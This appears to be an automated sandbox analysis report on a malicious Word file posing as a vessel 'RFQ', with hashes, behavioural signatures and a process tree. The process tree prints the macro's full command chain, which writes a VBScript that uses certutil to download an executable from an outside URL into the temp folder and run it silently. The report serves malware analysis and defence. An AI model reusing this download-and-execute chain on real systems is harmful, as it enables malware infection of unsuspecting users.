Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2022 07:55
Behavioral task
behavioral1
Sample
RFQ-MVP300-3400 For MSA New Vessel.doc
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
RFQ-MVP300-3400 For MSA New Vessel.doc
Resource
win10v2004-20220812-en
General
-
Target
RFQ-MVP300-3400 For MSA New Vessel.doc
-
Size
63KB
-
MD5
5d3e6d263bd94b901830e792fd237693
-
SHA1
de135c0e1255f334513aff51515de780d8ac8099
-
SHA256
7ce5a9235acf3eb2001197190b598be8fa49e8f0e2ef9d0ae0a1c2c3095cd7b7
-
SHA512
3b1a29ef85680507f70f374fa5ec72cc56387b258d4a39ee64dc3ac980170116a0ddff972813a40a247a28f761aa129fea20d69753c543fade5f30c4991a6355
-
SSDEEP
384:OiCquMo5W4eDbg8iSUR/8daGJrqrjKOxtXYI+Q/cj0tpbnopkpSEP0j:OiCXf5zSe/qvsuxI+4DpbnokSi
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3756 3968 cmd.exe WINWORD.EXE -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 4880 timeout.exe 4116 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3968 WINWORD.EXE 3968 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3968 WINWORD.EXE 3968 WINWORD.EXE 3968 WINWORD.EXE 3968 WINWORD.EXE 3968 WINWORD.EXE 3968 WINWORD.EXE 3968 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
WINWORD.EXEcmd.exeWScript.execmd.exedescription pid process target process PID 3968 wrote to memory of 3756 3968 WINWORD.EXE cmd.exe PID 3968 wrote to memory of 3756 3968 WINWORD.EXE cmd.exe PID 3756 wrote to memory of 4880 3756 cmd.exe timeout.exe PID 3756 wrote to memory of 4880 3756 cmd.exe timeout.exe PID 3756 wrote to memory of 772 3756 cmd.exe WScript.exe PID 3756 wrote to memory of 772 3756 cmd.exe WScript.exe PID 3756 wrote to memory of 4116 3756 cmd.exe timeout.exe PID 3756 wrote to memory of 4116 3756 cmd.exe timeout.exe PID 772 wrote to memory of 3572 772 WScript.exe cmd.exe PID 772 wrote to memory of 3572 772 WScript.exe cmd.exe PID 3572 wrote to memory of 4120 3572 cmd.exe certutil.exe PID 3572 wrote to memory of 4120 3572 cmd.exe certutil.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-MVP300-3400 For MSA New Vessel.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe5⤵
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\script.vbsFilesize
289B
MD5662449f1879133e0fc1f2385f79debfc
SHA147895b9fb941a4cf85224ead44e3dedb6b4ab6a0
SHA256749c75087d71b5be5b97333ac2a47bf758e4c2a6fc393c40bde00a73cea4fd98
SHA512d200dfb1e4900524d6663f5fc81f08decc5d8c57c57a6dd852e5ea4a59632c9ebec7ff59f275c4acd79130baaab799a5833394867f8acf9d75cf4ffa536e3c83
-
memory/772-141-0x0000000000000000-mapping.dmp
-
memory/3572-144-0x0000000000000000-mapping.dmp
-
memory/3756-139-0x0000000000000000-mapping.dmp
-
memory/3968-135-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmpFilesize
64KB
-
memory/3968-137-0x00007FF832E40000-0x00007FF832E50000-memory.dmpFilesize
64KB
-
memory/3968-138-0x00007FF832E40000-0x00007FF832E50000-memory.dmpFilesize
64KB
-
memory/3968-136-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmpFilesize
64KB
-
memory/3968-132-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmpFilesize
64KB
-
memory/3968-134-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmpFilesize
64KB
-
memory/3968-133-0x00007FF8356B0000-0x00007FF8356C0000-memory.dmpFilesize
64KB
-
memory/4116-142-0x0000000000000000-mapping.dmp
-
memory/4120-145-0x0000000000000000-mapping.dmp
-
memory/4880-140-0x0000000000000000-mapping.dmp